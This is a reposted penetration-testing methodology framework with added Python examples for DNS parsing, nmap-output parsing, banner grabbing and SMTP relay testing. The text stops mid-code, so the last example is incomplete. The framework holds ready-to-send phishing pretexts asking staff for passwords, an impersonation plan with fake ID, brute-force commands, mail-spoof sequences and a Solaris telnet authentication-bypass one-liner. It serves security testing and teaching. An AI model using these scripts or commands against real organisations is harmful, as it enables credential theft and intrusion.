The process [How to Hack] By Kevin Orrey

This information is solely for guidance. Unauthorised access to computer systems is illegal.
This post is well detailed, covering the terminology, tools and patterns that anyone interested in penetration testing should be familiar with: the preparation, the process and the count-down leading to an attack, and the various means of getting a target 'OWNED'. From the defensive point of view it also shows how these attacks can be prevented by anticipating the very techniques a would-be attacker would adopt.

Personally this is a lot of fun. There are so many things to learn from this post, especially for people who are looking to understand the long but precise process of penetrating, and protecting, a computer or network infrastructure by remote or physical means. For more information visit the link below for related topics, links to tools, information on relevant databases and other educational and authoritative bodies:

http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html

Enjoy The Post:

Changelog:
#

Major expansion Port 80
#

Minor alterations/ additions throughout
#

Port 3306 added – Input from Arvind Doraiswamy
#
Penetration Testing Framework 0.51

*
Pre-Inspection Visit – template User Link
*
Network Footprinting (Reconnaissance). The tester attempts to gather as much information as possible about the selected network. Reconnaissance takes two forms, passive and active. Passive reconnaissance is the best starting point: it sends no packets to the target, so it cannot trip intrusion detection systems or the other protection afforded to the network. It usually involves discovering publicly available information with a web browser, registries, archives and newsgroups. Active reconnaissance is more intrusive, may show up in audit logs, and may take the form of an attempted DNS zone transfer or a social-engineering approach.
o full-1
Whois is widely used for querying authoritative registries/ databases to discover the owner of a domain name, an IP address, or an autonomous system number of the system you are targeting.
+
Authoritative Bodies
#
IANA - Internet Assigned Numbers Authority User Link
#
ICANN - Internet Corporation for Assigned Names and Numbers. User Link
#
NRO - Number Resource Organisation User Link
#
RIR - Regional Internet Registry
*
AFRINIC - African Network Information Centre User Link
*
APNIC - Asia Pacific Network Information Centre User Link
o
National Internet Registry
+
APJII User Link
+
CNNIC User Link
+
JPNIC User Link
+
KRNIC User Link
+
TWNIC User Link
+
VNNIC User Link
*
ARIN – American Registry for Internet Numbers User Link
*
LACNIC – Latin America & Caribbean Network Information Centre User Link
*
RIPE NCC – Réseaux IP Européens Network Coordination Centre User Link
+
Websites
#
DNS Stuff User Link
*
Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.
#
Fixed Orbit User Link
*
Autonomous System lookups and other online tools available.
#
Geektools User Link
#
IP2Location User Link
*
Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.
#
Kartoo User Link
*
Metasearch engine that visually presents its results.
#
Maltego User Link
*
It is a great online resource for carrying out initial footprinting of your target network. It can be utilised in searching for the following: People, Groups of people (social networks), Companies, Organizations, Web sites, (including Domain and DNS details, Netblocks and IP addresses), Phrases, Affiliations, Documents and files
#
Netcraft User Link
*
Online search tool allowing queries for host information.
#
Robtex User Link
*
Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed.
#
Traceroute.org User Link
*
Website listing a large number links to online traceroute resources.
#
Wayback Machine User Link
*
Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.
#
Central Ops User Link
*
Domain Dossier
*
Email Dossier
#
Whois.net User Link
+
Tools
#
Cheops-ng User Link
#
Country whois User Link
#
Domain Research Tool User Link
#
Firefox Plugins
*
AS Number User Link
*
Shazou User Link
*
Firecat Suite User Link
#
Gnetutil User Link
#
Goolag Scanner User Link
#
Greenwich User Link
#
Maltego User Link
#
GTWhois User Link
#
Sam Spade User Link
#
Smart whois User Link
#
SpiderFoot User Link
o full-2
Internet Search
+
General Information
#
Web Investigator User Link
#
Tracesmart User Link
#
Friends Reunited User Link
#
Ebay – profiles etc. User Link
+
Financial
#
EDGAR – Company information, including real-time filings. US User Link
#
Google Finance – General Finance Portal User Link
#
Hoovers – Business Intelligence, Insight and Results. US and UK User Link
#
Companies House UK User Link
#
Land Registry UK User Link
+
Phone book/ Electoral Role Information
#
411 – Online White Pages and Yellow Pages. US User Link
#
Abika – Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US User Link
#
Zabasearch – People Search Engine. US User Link
#
192.com – Electoral Role Search. UK User Link
#
BT.com. UK
*
Residential User Link
*
Business User Link
+
Code Search User Link
+
Google Hacking Database User Link
+
Generic Web Searching
#
Linked To
*
(See also Kartoo)
#
Linked From
*
(See also Kartoo)
#
Forum Entries
#
Email Addresses
#
Contact Details
#
GHDB Results
#
Newsgroups/forums
#
Back end files
*
.exe / .txt / .doc / .ppt / .pdf / .vbs / .pl /
.sh / .bat / .sql / .xls / .mdb / .conf
#
Metagoofil User Link
*
metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
+
Social/ Business Networks
#
The following sites are some of the many social and business networking entities in use today. This list is not exhaustive and has been limited to those with over 1 million members.
*

Africa
o
BlackPlanet User Link
*
Australia
o
Bebo User Link
*
Belgium
o
Netlog User Link
*
Holland
o
Hyves User Link
*
Hungary
o
iWiW User Link
*
Iran
o
Cloob User Link
*
Japan
o
Mixi User Link
*
Korea
o
CyWorld User Link
*
Poland
o
Grono User Link
o
Nasza-klasa User Link
*
Russia
o
Odnoklassniki User Link
o
Vkontakte User Link
*
Sweden
o
LunarStorm User Link
*
UK
o
FriendsReunited et al User Link
o
Badoo User Link
o
FaceParty User Link
*
US
o
Facebook User Link
o
MySpace User Link
o
Classmates User Link
o
Friendster User Link
*
Assorted
o
Linkedin User Link
o
Care2 User Link
o
Habbo User Link
o
Hi5 User Link
o
MocoSpace User Link
o
Orkut User Link
o
Passado User Link
o
Tagged User Link
o
Windows Live Spaces User Link
o
Yahoo! 360° User Link
o full-3
DNS Record Retrieval from publicly available servers
+
Types of Information Records
#
SOA Records – Start of Authority: names the primary name server and the administrator's mailbox for the zone and carries the zone serial number and timers (see Database Settings below).
#
MX Records – List of a host's or domain's mail exchanger server(s), each with a preference value.
#
NS Records – List of a host's or domain's name server(s).
#
A Records – An address record mapping a host name to an IPv4 address (AAAA for IPv6). A host needs one for its IP address to be located via DNS.
#
PTR Records – Reverse lookup: maps an IP address (under in-addr.arpa or ip6.arpa) back to a host name.
#
SRV Records – Service location record: the host and port offering a named service, e.g. _ldap._tcp or _kerberos._udp, which reveals infrastructure on its own.
#
HINFO Records – Host information record with CPU type and operating system.
#
TXT Records – Generic text record (SPF policies and domain-verification tokens commonly live here).
#
CNAME – A host's canonical name, allowing additional names/ aliases to be used to locate a computer.
#
RP – Responsible person for the domain.
+
Database Settings
#
version.bind – a TXT query in the CHAOS class (dig @server version.bind chaos txt) that many BIND servers answer with their version string.
#
Serial – SOA field; increments on every zone change.
#
Refresh – SOA field; how often secondaries check for a new serial.
#
Retry – SOA field; interval between failed refresh attempts.
#
Expiry – SOA field; how long a secondary keeps serving the zone without a successful refresh.
#
Minimum – SOA field; negative-caching TTL.
+

Sub Domains
+
Internal IP ranges
#
Reverse DNS for IP Range
+
Zone Transfer (dig @nameserver domain axfr; a correctly configured server refuses AXFR to anything but its secondaries)
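As an added example (not part of Orrey's framework), the Python below builds the wire-format query that dig, host and nslookup send and parses the answer record by record, so the record types listed above can be recognised in a raw response. The response it parses is a constructed sample carrying an A and an MX record for example.com; `query_server` sends a real UDP query when given a resolver address and is the only function that touches the network.

```python
import socket
import struct

# Resource-record type numbers for the records listed above (RFC 1035, 1183, 2782, 3596).
TYPE_NAMES = {1: "A", 2: "NS", 5: "CNAME", 6: "SOA", 12: "PTR", 13: "HINFO",
              15: "MX", 16: "TXT", 17: "RP", 28: "AAAA", 33: "SRV", 255: "ANY"}
ANY = 255


def encode_name(name):
    r"""example.com -> \x07example\x03com\x00 (length-prefixed labels, root label last)."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\x00"


def build_query(name, qtype, txid=0x1234):
    """12-byte header (RD set, one question) followed by the question section."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def read_name(msg, off):
    """Decode a possibly compressed name starting at off; return (name, offset after it)."""
    labels, end = [], None
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                       # pointer to an earlier copy of the name
            if end is None:
                end = off + 2
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode())
        off += length
    return ".".join(labels), (end if end is not None else off)


def decode_rdata(msg, rtype, off, rdata):
    """Render RDATA for the record types the framework lists; off is where rdata starts in msg."""
    if rtype == 1:
        return socket.inet_ntoa(rdata)
    if rtype == 28:
        return socket.inet_ntop(socket.AF_INET6, rdata)
    if rtype in (2, 5, 12):                             # NS, CNAME, PTR carry a single name
        return read_name(msg, off)[0]
    if rtype == 15:                                     # MX: preference + exchange name
        pref = struct.unpack("!H", rdata[:2])[0]
        return f"{pref} {read_name(msg, off + 2)[0]}"
    if rtype == 6:                                      # SOA: two names + five 32-bit fields
        mname, o = read_name(msg, off)
        rname, o = read_name(msg, o)
        serial, refresh, retry, expire, minimum = struct.unpack("!IIIII", msg[o:o + 20])
        return (f"{mname} {rname} serial={serial} refresh={refresh} "
                f"retry={retry} expire={expire} minimum={minimum}")
    if rtype == 16:                                     # TXT: first character-string
        return rdata[1:1 + rdata[0]].decode(errors="replace")
    return rdata.hex()


def parse_response(msg):
    """Return header flags and every RR in the answer, authority and additional sections."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    for _ in range(qd):                                 # skip the echoed question(s)
        off = read_name(msg, off)[1] + 4
    records = []
    for _ in range(an + ns + ar):
        name, off = read_name(msg, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        value = decode_rdata(msg, rtype, off, msg[off:off + rdlen])
        off += rdlen
        records.append((name, TYPE_NAMES.get(rtype, str(rtype)), ttl, value))
    return {"id": txid, "authoritative": bool(flags & 0x0400),
            "rcode": flags & 0xF, "records": records}


def query_server(name, qtype, server, timeout=3.0):
    """Send the query to a resolver over UDP/53 (network access; not used by the offline test)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_query(name, qtype), (server, 53))
        data, _ = s.recvfrom(4096)
    return parse_response(data)


# Constructed sample response: an ANY answer for example.com carrying one A and one MX record.
# The answer names and the MX exchange use compression pointers (0xC00C) back to the question name.
SAMPLE_RESPONSE = (
    struct.pack("!HHHHHH", 0x1234, 0x8180, 1, 2, 0, 0)
    + encode_name("example.com") + struct.pack("!HH", ANY, 1)
    + b"\xC0\x0C" + struct.pack("!HHIH", 1, 1, 300, 4) + socket.inet_aton("93.184.216.34")
    + b"\xC0\x0C" + struct.pack("!HHIH", 15, 1, 300, 9) + struct.pack("!H", 10) + b"\x04mail\xC0\x0C"
)

if __name__ == "__main__":
    for record in parse_response(SAMPLE_RESPONSE)["records"]:
        print(record)
```

Against a live resolver, `query_server("example.com", 6, "resolver_ip")` returns the SOA fields named under Database Settings, and a `records` list longer than the answer count signals the authority and additional sections that give away further name servers.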
o full-5
The following shows the most popular Social Engineering approaches, remote (phone and e-mail) and local (in person).
+
Remote
#
Phone
*
Scenarios
o
IT Department.
“Hi, it’s Zoe from the helpdesk. I am doing a security audit of the network
and I need to re-synchronise the Active Directory usernames and passwords.

This is so that your logon process in the morning receives no undue delays”

If you are calling from a mobile number, explain that the helpdesk has been
issued a mobile phone for ‘on call’ personnel.
*
Results
*
Contact Details
o
Name
o
Phone number
o
Email
o
Room number
o
Department
o
Role
#
Email
*
Scenarios
o
Hi there, I am currently carrying out an Active Directory Health Check
for TARGET COMPANY and require to re-synchronise some outstanding
accounts on behalf of the IT Service Desk. Please reply to me
detailing the username and password you use to logon to your desktop
in the morning. I have checked with MR JOHN DOE, the IT Security
Advisor and he has authorised this request. I will then populate the
database with your account details ready for re-synchronisation with
Active Directory such that replication of your account will be
re-established (this process is transparent to the user and so
requires no further action from yourself). We hope that this exercise
will reduce the time it takes for some users to logon to the network.

Best Regards,

Andrew Marks
o
Good Morning,

The IT Department had a critical failure last night regarding remote access to the corporate network, this will only affect users that occasionally work from home.

If you have remote access, please email me with your username and access requirements e.g. what remote access system did you use? VPN and IP address etc, and we will reset the system. We are also using this ‘opportunity’ to increase the remote access users, so if you believe you need to work from home occasionally, please email me your usernames so I can add them to the correct groups.

If you wish to retain your current credentials, also send your password. We do not require your password to carry out the maintenance, but it will change if you do not inform us of it.

We apologise for any inconvenience this failure has caused and are working to resolve it as soon as possible. We also thank you for your continued patience and help.

Kindest regards,

lee
EMAIL SIGNATURE
*
Software
*
Results
*
Contact Details
o
Name
o
Phone number
o
Email
o
Room number
o
Department
o
Role
#
Other
+
Local
#
Personas
*
Name
o
Suggest same 1st name.
*
Phone
o
Give work mobile, but remember they have it!
*
Email
o
Have a suitable email address
*
Business Cards
o
Get cards printed
#
Contact Details
*
Name
*
Phone number
*
Email
*
Room number
*
Department
*
Role
#
Scenarios
*
New IT employee
o
New IT employee.
“Hi, I’m the new guy in IT and I’ve been told to do a quick survey of users on the network. They give all the worst jobs to the new guys don’t they? Can you help me out on this?”

Get the following information, trying to put an "any problems with it we can help with?" slant on it.
Username
Domain
Remote access (Type – Modem/VPN)
Remote email (OWA)
Most used software?
Any comments about the network?
Any additional software you would like?
What do you think about the security on the network? Password complexity etc.
Now give reasons as to why they have complexity for passwords, try and get someone to give you their password and explain how you can make it more secure.

“Thanks very much and you’ll see the results on the company boards soon.”
*
Fire Inspector
o
Turning up on the pretext of a snap fire inspection, in line with local government initiatives on fire safety in the workplace.

Ensure you have a suitable appearance – High visibility jacket – Clipboard – ID card (fake).

Check for:
number of fire extinguishers, pressure, type.
Fire exits, accessibility etc.

Look for any information you can get. Try to be left on your own, without supervision!
#
Results
#
Maps
*
Satellite Imagery
o
Google Maps
*
Building layouts
#
Other
o full-6
Dumpster Diving
+
Rubbish Bins
+
Contract Waste Removal
+
Ebay ex-stock sales i.e. HDD
o full-7
Web Site copy
+
HTTrack User Link
+
Teleport Pro User Link
+
Black Widow User Link
*
Discovery & Probing. Enumeration can serve two distinct purposes in an assessment:
OS Fingerprinting
Remote applications being served.
OS fingerprinting, or TCP/IP stack fingerprinting, is the process of determining the operating system running on a remote host by analysing the packets received from it. It can be done actively (e.g. nmap -O, xprobe2) or passively (e.g. p0f).

Passive OS fingerprinting determines the remote OS from packets the host sends anyway (or from captured traffic) and requires no packets to be sent to it.
Active OS fingerprinting is noisy: it sends packets, often deliberately malformed ones, to the remote host and examines the reply, or the lack of one. Different operating systems respond differently because the RFCs leave some behaviour unspecified (initial window size, default TTL, TCP option ordering, responses to unusual flag combinations) and vendors (notably Microsoft) have made their own implementation choices.

The applications served by a host can be determined from its open ports. Port scanning, followed by service and version probing, builds up a picture of what is running so the test can be tailored accordingly.
o
Default Port Lists
+
Windows User Link
+
*nix User Link
o
Enumeration tools and techniques – The vast majority can be used generically; however, certain bespoke applications require their own specific toolsets. Default passwords are platform and vendor specific.
+
General Enumeration Tools
#
nmap User Link
*
nmap -n -A -Pn -p- -T aggressive -iL nmap.targetlist -oX nmap.syn.results.xml (-Pn replaces the old -P0: skip host discovery and scan every listed target)
*
nmap -sU -Pn -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results
*
nmap -sV -Pn -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results
*
grep "appears to be up" nmap_saved_filename | awk -F'(' '{print $2}' | awk -F')' '{print $1}' > ip_list (matches the normal output of older nmap releases; newer ones print "Nmap scan report for host (ip)" and "Host is up", so prefer -oG or -oX and parse those)
#
netcat User Link
*
nc -v -w 2 -z IP_Address port_range/port_number (-z: connect without sending data; -w 2: two-second timeout)
*
nc -v -n IP_Address port (connect to a single port and read the banner by hand)
#
amap User Link
*
amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]
*
amap -bqv 192.168.1.1 80
#
xprobe2 User Link
*
xprobe2 192.168.1.1
#
sinfp User Link
*
./sinfp.pl -i ip_address -p open_tcp_port
#
nbtscan User Link
*
nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)
#
hping User Link
*
hping ip_address
#
scanrand User Link
*
scanrand ip_address:all
#
unicornscan User Link
*
unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/CIDR_NET_MASK:S-E (S-E is the start and end of the port range, e.g. 192.168.1.0/24:1-1024)
#
netenum User Link
*
netenum network/netmask timeout
#
fping User Link
*
fping -a -d hostname/ (Network/Subnet_Mask)
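As an added example, not taken from the framework or from nmap itself, the following Python parses nmap's greppable output (-oG) into live hosts and open ports. It is a more robust replacement for the grep/awk pipeline under nmap above, whose text match breaks whenever nmap changes its normal output. The scan output it reads is a constructed sample.

```python
import re

# Constructed sample of nmap -oG output: two hosts up, one down.
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated Mon Jan  1 10:00:00 2024 as: nmap -sS -sV -p 21,22,80,443 -oG - 192.0.2.0/29
Host: 192.0.2.1 (gw.example.com)\tStatus: Up
Host: 192.0.2.1 (gw.example.com)\tPorts: 22/open/tcp//ssh//OpenSSH 7.4/, 80/open/tcp//http//Apache httpd 2.4.6/, 443/closed/tcp//https///\tIgnored State: filtered (1)
Host: 192.0.2.2 ()\tStatus: Up
Host: 192.0.2.2 ()\tPorts: 21/open/tcp//ftp//vsftpd 3.0.3/, 22/filtered/tcp//ssh///
Host: 192.0.2.3 ()\tStatus: Down
# Nmap done at Mon Jan  1 10:00:05 2024 -- 8 IP addresses (2 hosts up) scanned in 5.01 seconds
"""

HOST_RE = re.compile(r"^Host: (\S+) \(([^)]*)\)\t(.*)$")


def parse_gnmap(text):
    """Return {ip: {"hostname": str, "up": bool, "ports": [(port, proto, state, service, version)]}}."""
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue                                  # comment lines and blanks
        ip, hostname, rest = m.groups()
        entry = hosts.setdefault(ip, {"hostname": hostname, "up": False, "ports": []})
        for field in rest.split("\t"):                # "Status: Up", "Ports: ...", "Ignored State: ..."
            key, _, value = field.partition(": ")
            if key == "Status":
                entry["up"] = value == "Up"
            elif key == "Ports":
                for port_spec in value.split(", "):
                    # port/state/protocol/owner/service/rpc info/version/ ; nmap replaces any
                    # "/" inside a field with "|", so splitting on "/" is safe.
                    port, state, proto, _owner, service, _rpc, version, _ = port_spec.split("/")
                    entry["ports"].append((int(port), proto, state, service, version))
    return hosts


def live_hosts(hosts):
    """IPs that answered: the equivalent of the grep/awk ip_list above."""
    return sorted(ip for ip, h in hosts.items() if h["up"])


def open_ports(hosts):
    """(ip, port, service, version) for every open port, ready to drive the per-port checks below."""
    return [(ip, port, svc, ver) for ip, h in hosts.items()
            for port, _proto, state, svc, ver in h["ports"] if state == "open"]


if __name__ == "__main__":
    parsed = parse_gnmap(SAMPLE_GNMAP)
    print(live_hosts(parsed))
    for row in open_ports(parsed):
        print(row)
```

Feeding `open_ports()` into the per-port sections that follow (FTP on 21, SSH on 22, web on 80/8080 and so on) turns the scan output directly into a worklist.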
+
Firewall Specific Tools
#
firewalk User Link
*
firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]
#
ftester User Link
*
Host 1 (behind the firewall, runs the sniffer): ./ftestd -i eth0 -v
Host 2 (the injecting side): ./ftest -f ftest.conf -v -d 0.01
Then compare what was sent with what got through: ./freport ftest.log ftestd.log
+
VOIP Specific Tools
#
SiVus User Link
#
sipsak User Link
*
Tracing paths: – sipsak -T -s sip:username@domain
*
Options request:- sipsak -vv -s sip:username@domain
*
Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain
#
smap User Link
*
smap IP_Address/Subnet_Mask
*
smap -o IP_Address/Subnet_Mask
*
smap -l IP_Address
#
Sipscan User Link
+
Default Passwords (Examine list) User Link
#
Passwords A User Link
#
Passwords B User Link
#
Passwords C User Link
#
Passwords D User Link
#
Passwords E User Link
#
Passwords F User Link
#
Passwords G User Link
#
Passwords H User Link
#
Passwords I User Link
#
Passwords J User Link
#
Passwords K User Link
#
Passwords L User Link
#
Passwords M User Link
#
Passwords N User Link
#
Passwords O User Link
#
Passwords P User Link
#
Passwords R User Link
#
Passwords S User Link
#
Passwords T User Link
#
Passwords U User Link
#
Passwords V User Link
#
Passwords W User Link
#
Passwords X User Link
#
Passwords Y User Link
#
Passwords Z User Link
#
Passwords (Numeric) User Link
o
Active Hosts
+
Open TCP Ports
+
Closed TCP Ports
+
Open UDP Ports
+
Closed UDP Ports
+
Service Probing
#
SMTP Mail Bouncing
#
Banner Grabbing
*
Other
*
HTTP
o
Commands (typed by hand over nc/telnet; the bogus method and version in the first two elicit server-specific error pages and header ordering, which is what httprint-style fingerprinting keys on)
+
JUNK / HTTP/1.0
+
HEAD / HTTP/9.3
+
OPTIONS / HTTP/1.0
+
HEAD / HTTP/1.0
o
Extensions
+
WebDAV
+
ASP.NET
+
Frontpage
+
OWA
+
IIS ISAPI
+
PHP
+
OpenSSL
*
HTTPS
o
Use stunnel (or openssl s_client -connect host:443) to wrap the same plaintext probes in TLS.
*
SMTP
*
POP3
*
FTP
o
If the banner has been altered, attempt an anonymous logon and run 'quote help' and 'syst':
the supported command set and the SYST reply usually give the server type away.
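As an added example (not part of the original framework), the Python below performs the connect scan and banner grab that the nmap, netcat and telnet commands above do by hand: it records a port as open, closed or filtered, waits for a server-speaks-first banner (FTP, SSH, SMTP, POP3), and otherwise sends a probe such as HEAD / HTTP/1.0 for client-speaks-first services. The banner strings and the loopback fake service used to exercise it are constructed for this example.

```python
import socket
import socketserver
import threading

# Probe to send when a service says nothing after connect (client-speaks-first protocols such as HTTP).
HTTP_PROBE = b"HEAD / HTTP/1.0\r\n\r\n"
PROBES = {80: HTTP_PROBE, 8000: HTTP_PROBE, 8080: HTTP_PROBE}


def grab_banner(host, port, timeout=2.0, probe=None):
    """Connect, wait for a banner, else send the probe; return (state, banner_bytes)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
    except ConnectionRefusedError:                    # RST came back: nothing is listening
        s.close()
        return "closed", b""
    except (socket.timeout, OSError):                 # no answer or unreachable: filtered
        s.close()
        return "filtered", b""
    try:
        try:
            banner = s.recv(1024)
        except socket.timeout:
            banner = b""
        if not banner and probe:
            s.sendall(probe)
            try:
                banner = s.recv(1024)
            except socket.timeout:
                banner = b""
        return "open", banner
    finally:
        s.close()


def scan(host, ports, timeout=1.0):
    """Connect scan plus banner grab, like nc -z followed by nc -v; returns {port: (state, banner)}."""
    return {p: grab_banner(host, p, timeout, PROBES.get(p)) for p in ports}


class _FakeService(socketserver.BaseRequestHandler):
    """Constructed service for offline testing: announce a banner, or answer HEAD like a web server."""
    def handle(self):
        if self.server.banner:
            self.request.sendall(self.server.banner)
            return
        request = self.request.recv(1024)             # HTTP-style: the client must speak first
        if request.startswith(b"HEAD"):
            self.request.sendall(b"HTTP/1.0 200 OK\r\nServer: Apache/2.4.6 (constructed)\r\n\r\n")


def start_fake_service(banner):
    """Listen on an ephemeral loopback port; returns (port, server). Call server.shutdown() when done."""
    srv = socketserver.TCPServer(("127.0.0.1", 0), _FakeService)
    srv.banner = banner
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv.server_address[1], srv


def free_port():
    """A loopback port that is currently closed, for the negative case."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    port, srv = start_fake_service(b"220 ftp.example.com FTP server (vsFTPd 3.0.3) ready.\r\n")
    for p, (state, banner) in scan("127.0.0.1", [port, free_port()]).items():
        print(p, state, banner.decode(errors="replace").strip())
    srv.shutdown()
    srv.server_close()
```

The three-way distinction matters for the Firewall Assessment step below: a refused connection proves a host is reachable, while a timeout says only that something in the path dropped the SYN.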
+
ICMP Responses
#
Type 3 (Destination Unreachable; code 3, Port Unreachable, is the reply to a UDP probe of a closed port, and which codes a host emits helps fingerprint it)
#
Type 8 (Echo Request)
#
Type 13 (Timestamp Request)
#
Type 15 (Information Request, obsolete; few stacks still answer)
#
Type 17 (Address Mask Request)
#
Responses from broadcast address
+
Source Port Scans (stateless filters sometimes admit anything whose source port looks like a trusted service; nmap -g/--source-port and hping set it)
#
TCP/UDP 53 (DNS)
#
TCP 20 (FTP Data)
#
TCP 80 (HTTP)
#
TCP/UDP 88 (Kerberos)
+
Firewall Assessment
#
Firewalk
#
TCP/UDP/ICMP responses
+
OS Fingerprint
*
Enumeration
o
FTP port 21 open
+
Fingerprint server
#
telnet ip_address 21 (banner grab)
#
ftp ip_address (the client shows the banner and prompts for a login)
#
Check for anonymous access
*
ftp ip_address
Username: anonymous (or ftp)
Password: any@email.com (anonymous servers conventionally expect an e-mail address)
+ full-2
Password guessing
#
Hydra brute force User Link
#
medusa User Link
#
Brutus User Link
+ full-3
Examine configuration files
#
ftpusers
#
ftp.conf
#
proftpd.conf
+
MiTM
#
pasvagg.pl User Link
o
SSH port 22 open
+ full-1
Fingerprint server
# full-1
telnet ip_address 22 (banner grab)
# full-2
scanssh User Link
*
scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask
+ full-2
Password guessing
# full-1
ssh root@ip_address
# full-2
guess-who User Link
*
./b -l username -h ip_address -p 22 -2 < password_file_location
# full-3
Hydra brute force User Link
# full-4
brutessh User Link
# full-5
Ruby SSH Bruteforcer User Link
+ full-3
Examine configuration files
#
ssh_config
#
sshd_config
#
authorized_keys
#
ssh_known_hosts
#
.shosts
+ full-5
SSH Client programs
#
tunnelier User Link
#
winsshd User Link
#
putty User Link
#
winscp User Link
o
Telnet port 23 open
+ full-1
Fingerprint server
# full-1
telnet ip_address
*
Common Banner List (OS -> banner)
Solaris 8               -> SunOS 5.8
Solaris 2.6             -> SunOS 5.6
Solaris 2.4 or 2.5.1    -> Unix(r) System V Release 4.0 (hostname)
SunOS 4.1.x             -> SunOS Unix (hostname)
FreeBSD                 -> FreeBSD/i386 (hostname) (ttyp1)
NetBSD                  -> NetBSD/i386 (hostname) (ttyp1)
OpenBSD                 -> OpenBSD/i386 (hostname) (ttyp1)
Red Hat 8.0             -> Red Hat Linux release 8.0 (Psyche)
Debian 3.0              -> Debian GNU/Linux 3.0 / hostname
SGI IRIX 6.x            -> IRIX (hostname)
IBM AIX 4.1.x           -> AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.
IBM AIX 4.2.x or 4.3.x  -> AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.
Nokia IPSO              -> IPSO (hostname) (ttyp0)
Cisco IOS               -> User Access Verification
Livingston ComOS        -> ComOS - Livingston PortMaster

# full-2
telnetfp User Link
+ full-2
Password Attack
# full-1

Common passwords
User Link
# full-2
Hydra brute force User Link
# full-3
Brutus User Link
#
telnet -l "-froot" hostname (unpatched Solaris 10: the in.telnetd -f authentication bypass, CVE-2007-0882)
+ full-3
Examine configuration files
#
/etc/inetd.conf
#
/etc/xinetd.d/telnet
#
/etc/xinetd.d/stelnet
o
Sendmail Port 25 open
+ full-1
Fingerprint server
#
telnet ip_address 25 (banner grab)
+ full-2
Mail Server Testing
#
Enumerate users
*
VRFY username (asks the server to confirm that a mailbox exists – account enumeration)
*
EXPN alias (asks the server to expand a mailing list or alias into its member addresses – account enumeration)
#
Mail Spoof Test (does the server accept a forged envelope sender?)
*
HELO anything
MAIL FROM: spoofed_address
RCPT TO: valid_mail_account
DATA
(message text)
.
QUIT
#
Mail Relay Test (each variant below changes the envelope; a 250 to RCPT TO for a non-local recipient, followed by accepted DATA, means the server relays. The addresses shown are illustrative placeholders.)
*
HELO anything
o
Identical to/from – mail from: <user@target_domain> rcpt to: <user@target_domain>
o
Unknown domain – mail from: <user@unknown_domain> rcpt to: <user@recipient_domain>
o
Domain not present – mail from: <user@localhost> rcpt to: <user@recipient_domain>
o
Domain not supplied – mail from: <user> rcpt to: <user@recipient_domain>
o
Source address omission – mail from: <> rcpt to: <user@recipient_domain>
o
Use IP address of target server – mail from: <user@IP_Address> rcpt to: <user@recipient_domain>
o
Use double quotes – mail from: <user@target_domain> rcpt to: <"user@recipient_domain">
o
Use IP address of the target server in the recipient – mail from: <user@target_domain> rcpt to: <user@[IP_Address]>
o
Disparate formatting (source route) – mail from: <user@target_domain> rcpt to: <@target_domain:nobody@recipient_domain>
o
Disparate formatting 2 (bang path) – mail from: <user@target_domain> rcpt to: <recipient_domain!nobody@[IP_Address]>
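As an added example (not from the framework), the Python below drives the relay matrix above against an SMTP server and records which envelope combinations are accepted. `FakeMta` is a constructed stand-in that refuses non-local recipients unless `open_relay` is set, so the matrix can be exercised offline; `SocketLine` wraps a real TCP connection for use against a test target. The domains and IP address are placeholders.

```python
import re
import socket


def relay_test_cases(target_domain, target_ip, recipient_domain):
    """The framework's relay matrix as (name, MAIL FROM, RCPT TO) triples; addresses are placeholders."""
    t, ip, r = target_domain, target_ip, recipient_domain
    return [
        ("identical to/from",              f"<user@{t}>",            f"<user@{t}>"),
        ("unknown sender domain",          "<user@unknown.invalid>", f"<user@{r}>"),
        ("domain not present",             "<user@localhost>",       f"<user@{r}>"),
        ("domain not supplied",            "<user>",                 f"<user@{r}>"),
        ("source address omission",        "<>",                     f"<user@{r}>"),
        ("sender at target IP",            f"<user@{ip}>",           f"<user@{r}>"),
        ("double-quoted recipient",        f"<user@{t}>",            f'<"user@{r}">'),
        ("recipient at target IP literal", f"<user@{t}>",            f"<user@[{ip}]>"),
        ("source route",                   f"<user@{t}>",            f"<@{t}:nobody@{r}>"),
        ("bang path",                      f"<user@{t}>",            f"<{r}!nobody@[{ip}]>"),
    ]


class SmtpSession:
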